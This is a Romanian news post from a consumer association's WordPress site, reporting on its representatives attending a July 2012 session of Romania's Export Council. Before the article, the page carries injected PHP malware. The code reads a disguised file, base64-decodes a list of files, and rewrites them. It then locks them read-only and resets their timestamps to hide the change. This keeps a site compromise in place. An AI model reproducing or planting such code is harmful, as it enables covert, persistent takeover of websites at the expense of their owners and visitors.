$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Reprezentantii A.N.P.C.P.P.S. Romania-InfoCons au participat la sedinta Consiliului de Export al Romaniei, din cadrul Ministerului Economiei, Comertului si Mediului de Afaceri. – O noua atitudine

Ieri, 30 iulie 2012, reprezentantii A.N.P.C.P.P.S. Romania-InfoCons au participat la sedinta Consiliului de Export al Romaniei, din cadrul Ministerului Economiei, Comertului si Mediului de Afaceri.

 

Printre subiectele dezbatute in cadrul acestei reuniuni, se numara si aprobarea criteriilor suplimentare de repartizare a fondurilor bugetare pe domenii / ramuri de export şi de selecţie pentru firmele participante la acţiunile promoţionale cu sprijin de la bugetul de stat, prezentare sustinuta de domnul Director al al Departamentului de Comert Exterior, Costin Lianu.

De asemenea, domnul Alexandru Borcea, presedinte al Asociatiei Romane de Industrie Electronica si Software, a prezentat care ar fi interventiile posibile ale Comisiei Europene asupra programelor fondurilor structurale 2014–2020, precum si Strategia Uniunii Europene pentru Regiunea Dunării.

Pe Ordinea de zi s-a mai aflat si un alt punct de dezbatere, cu privire la utilizarea fondurilor bugetare pe semestrul I al anului 2012.

A.N.P.P.C.P.P.S. Romania este membra a Consiliului de Export al Romaniei inca din anul 2010.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S. Romania – o9atitudine ! – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International,  membra fondatoare a Federatiei Asociatiilor de Consumatori, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor.

 

 

 

 

By o9admin